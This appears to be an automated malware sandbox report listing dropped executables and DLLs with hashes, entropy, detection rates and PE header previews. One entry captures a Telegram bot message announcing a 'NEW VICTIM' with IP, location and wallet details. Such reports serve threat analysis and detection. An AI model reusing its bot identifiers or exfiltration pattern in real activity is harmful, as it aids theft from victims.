                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1861632
                                                                                                                                                                                                                            Entropy (8bit):7.947162986091251
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:pXszOuMpJuVj4ozSuhfA6CFRStA4LyHY7LJAf:ezDMeVj2ICFRFOyHY7LJi
                                                                                                                                                                                                                            MD5:15709EBA2AFAF7CC0A86CE0ABF8E53F1
                                                                                                                                                                                                                            SHA1:238EBF0D386ECF0E56D0DDB60FACA0EA61939BB6
                                                                                                                                                                                                                            SHA-256:10BFF40A9D960D0BE3CC81B074A748764D7871208F324DE26D365B1F8EA3935A
                                                                                                                                                                                                                            SHA-512:65EDEFA20F0BB35BEE837951CCD427B94A18528C6E84DE222B1AA0AF380135491BB29A049009F77E66FCD2ABE5376A831D98E39055E1042CCEE889321B96E8E9
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................PI...........@...........................I.....IA....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...wekcazbo.....P/......^..............@...ttllozcv.....@I......@..............@....taggant.0...PI.."...F..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):540672
                                                                                                                                                                                                                            Entropy (8bit):7.614709628313703
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:huB9du8NOZx84E5YoShCwrp1OkwWFewdYHMUzN4r52ki:i9du88Zx8VAwBkewVUckki
                                                                                                                                                                                                                            MD5:9AB250B0DC1D156E2D123D277EB4D132
                                                                                                                                                                                                                            SHA1:3B434FF78208C10F570DFE686455FD3094F3DD48
                                                                                                                                                                                                                            SHA-256:49BFA0B1C3553208E59B6B881A58C94BB4AA3D09E51C3F510F207B7B24675864
                                                                                                                                                                                                                            SHA-512:A30FB204B556B0DECD7FAB56A44E62356C7102BC8146B2DFD88E6545DEA7574E043A3254035B7514EE0C686A726B8F5BA99BCD91E8C2C7F39C105E2724080EF0
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<...............................p....................................................J..l............................text...+........................... ..`.rdata..|...........................@..@.data....%...`.......J..............@....tls.................`..............@....reloc..p............b..............@..B.bss................................@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):967680
                                                                                                                                                                                                                            Entropy (8bit):6.697114503196455
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:AqDEvCTbMWu7rQYlBQcBiT6rprG8aYaAd:ATvC/MTQYxsWR7aY
                                                                                                                                                                                                                            MD5:3F47413343D51345115E32189E96C142
                                                                                                                                                                                                                            SHA1:814878B4E6A013F0B4496D06B1AA3F9651110D6B
                                                                                                                                                                                                                            SHA-256:911AFE4EAE44C46023873DAD98A949611BF5C4881E27A967C70128CE78779550
                                                                                                                                                                                                                            SHA-512:7E76A0CD9518C21A34A9E6D1DBE983B478C4FE3C1781E7717FE19279FF2E18FD6CB2450A7A08E20037842024D7C95B5729451D4D9CB7478BFD4E6BD3AEF45FF5
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....jg..........".................w.............@.......................... ......y.....@...@.......@.....................d...|....@...X.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....X...@...Z..................@..@.reloc...u.......v...N..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3083776
                                                                                                                                                                                                                            Entropy (8bit):6.4573715557920695
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:WTuLCWzBfjFCnSWT1fsrdksICC1jBSzK/Er:1FcKj3
                                                                                                                                                                                                                            MD5:75CA34215F6E3916C51C0AF34FC17284
                                                                                                                                                                                                                            SHA1:3726BA089194DF9221B1EED520D62E452D74D509
                                                                                                                                                                                                                            SHA-256:4D2340448332A51CEAFE2CB2562B2441590EFF605B7FC0478001AD103F495955
                                                                                                                                                                                                                            SHA-512:51A8285CD0C989CA4A659FB84F401F81E92BCC9A2B03F3F55DA565BC2A9B6FEFB115DDB0009D675E265E391C65FB4DEFC6326037B70B03EB6ED1364F1D7DC679
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 52%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................q^.....q^.....q^....._..............G...A_.....A_...........A_.....Y.....Y.....Rich....................PE..d....._g.........."....(............`..........@..............................C...........`..........................................H@.\...lH@.......B.b.....A..\............C.....0.=.T.....................=.(....=.@.............'............................. ..].......^.................. ..` .h....p.......b.............. ..` ................................. ..q....'..r..................@..@ ......p@.. ...r-.............@... ..\....A..^....-.............@..@ .b.....B.....................@..@ .......C......./.............@..B........................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):605696
                                                                                                                                                                                                                            Entropy (8bit):6.377818589865092
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                                            MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                            SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                                            SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                                            SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[3].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2810368
                                                                                                                                                                                                                            Entropy (8bit):6.474438374061188
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:nV/m2/B+kJrzSbN+PGKEMgJ/NF+WmyliJuDy0O+YroxNoBMECq8Ypa:Vu2nZSbQU9J/NF+WmbJu
                                                                                                                                                                                                                            MD5:A55D697A530E905F6C6539469BA973BD
                                                                                                                                                                                                                            SHA1:A6901B1E614C610538E71F171FEC23D515402831
                                                                                                                                                                                                                            SHA-256:09F3469875A5AE90958DFC043B7677630DD2868C42FC9088C97DAF54A7F2ECFE
                                                                                                                                                                                                                            SHA-512:2E94B5026B10D146AEAAA17B2CE34A400C2049BC50EC7B39D84B53ACC402DEBD76594CF24A71AF65A0FA41A9A433968313DB8B946A0F5AB419D2BC91A2D58811
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$........... +.. ...`....@.. .......................`+......#+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...rqcwpexm.`*......T*..h..............@...viefdblt. ....+.......*.............@....taggant.@... +.."....*.............@...................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4438776
                                                                                                                                                                                                                            Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                            MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                            SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                            SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                            SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sendMessage[1].json

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):777
                                                                                                                                                                                                                            Entropy (8bit):5.117823166783023
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:YKOHE0y1JVBa4YGQVPe071kWXPyoZEB6/asJENBm9c:YVH5QTBj/Q51zPtZpujMc
                                                                                                                                                                                                                            MD5:0314BDF1A471CFC690C40C0A2C481AEB
                                                                                                                                                                                                                            SHA1:D8572D2F755A354F4288443F5119803084121AF8
                                                                                                                                                                                                                            SHA-256:4ADB1AD74C53AECE5B7CBE4A4FB47ADA14FF4EE3167A0352FC8F1BC56192443A
                                                                                                                                                                                                                            SHA-512:CBC050393C45E8BF129B16581B6CB7C9A6740FBDD4C4A784FA6335243FA11315E36E5DC7E27027E9106DBAAED82030354FEA971D6864398D63BAC260A883BD9C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:{"ok":true,"result":{"message_id":44896,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1735035854,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 760639\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                                                                                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                                                                                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                                                                                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                                                                                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:@...e.................................&..............@..........

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2931200
                                                                                                                                                                                                                            Entropy (8bit):6.50607725991172
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:yLAf12U1ev5LTQPYAspIEU3skhieZqYyEmNVqSG:yk0U1wxUPYzSjhimEHqSG
                                                                                                                                                                                                                            MD5:1C22D90D4F3C0BE6834E0777C7B4D18A
                                                                                                                                                                                                                            SHA1:C1700CDA1DBD134CBC353F6A5C75863A36FF8FEF
                                                                                                                                                                                                                            SHA-256:C4A413D00C7EDA2AEDBAFE67AFEB0F887531B01335FD59CE51D9901F829AEDFE
                                                                                                                                                                                                                            SHA-512:E802C6DFE35239EDBD867AA4C2B0D9FEB13A1FF017E079D2A14810ABAF963879B601F9DE1919E2586C8138ED34D46EE615C3CEB5BEFC5BBA913B4BE441470320
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig............................../...........@.........................../.....C.-...@.................................Y@..m............................A...................................................................................... . . .......d..................@....rsrc .....0.......t..............@....idata .....@.......t..............@...ibdqnddj. *..P....*..v..............@...izikvcoa.....p/.......,.............@....taggant.0..../.."....,.............@...........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
